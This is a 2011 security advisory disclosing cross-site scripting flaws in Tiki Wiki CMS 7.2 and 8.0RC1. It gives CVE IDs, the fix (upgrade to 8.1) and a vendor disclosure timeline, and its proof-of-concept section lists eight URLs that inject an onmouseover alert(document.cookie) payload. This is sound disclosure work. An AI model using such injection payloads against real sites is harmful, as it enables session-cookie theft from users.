INFOSERVE-ADV2011-01 - Tiki Wiki CMS Groupware Multiple XSS vulnerabilities
Advisory:
|
Tiki Wiki CMS Groupware Multiple XSS vulnerabilities
|
Advisory ID:
|
INFOSERVE-ADV2011-01
|
Author:
|
Stefan Schurtz
|
Contact:
|
|
Affected Software:
|
Successfully tested on Tiki 7.2 & 8.0 RC1
|
Vendor URL:
|
|
Vendor Status:
|
fixed for Tiki 7 (New Tiki 6 LTS release in progress)
|
CVE-ID:
|
CVE-2011-4454, CVE-2011-4455
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
All versions of Tiki 6 and Tiki 7 and version Tiki 8.0RC1 are prone to multiple XSS vulnerabilities
==============
PoC-Exploit
==============
PoC-Exploit
==============
8.0RC1
http://<target>/tiki-8.0.RC1/tiki-remind_password.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-index.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-login_scr.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-index/" onmouseover="alert(document.cookie)"
|
7.2
http://<target>/tiki-7.2/tiki-admin_system.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-7.2/tiki-pagehistory.php/" onmouseover="alert(document.cookie)" http://<target>/tiki-7.2/tiki-removepage.php/" onmouseover="alert(document.cookie)" http://<target>/tiki-7.2/tiki-rename_page.php/" onmouseover="alert(document.cookie)" |
=====
Solution
=====
Solution
=====
Upgrade to Tiki 8.1 (End-of-Life for Tiki 7.x)
================
Disclosure Timeline
================
Disclosure Timeline
================
02-Nov-2011 – informed Security Team (security@tikiwiki.org)
03-Nov-2011 – feedback from vendor
11-Nov-2011 – release of version 8.1 (End-of-Life for Tiki 7.x)
03-Nov-2011 – feedback from vendor
11-Nov-2011 – release of version 8.1 (End-of-Life for Tiki 7.x)
====
Credits
====
Credits
====
Vulnerabilities found and advisory written by the INFOSERVE Security Team
=======
References
=======
References
=======
http://info.tiki.org/
http://dev.tiki.org/tiki-view_tracker_item.php?itemId=4027#content1
http://info.tiki.org/article182-Tiki-8-1-Now-Available-End-of-Life-for-Tiki-7-x
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-01.txt
http://secunia.com/advisories/46740
http://dev.tiki.org/tiki-view_tracker_item.php?itemId=4027#content1
http://info.tiki.org/article182-Tiki-8-1-Now-Available-End-of-Life-for-Tiki-7-x
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-01.txt
http://secunia.com/advisories/46740
Comments
Display comments as Linear | Threaded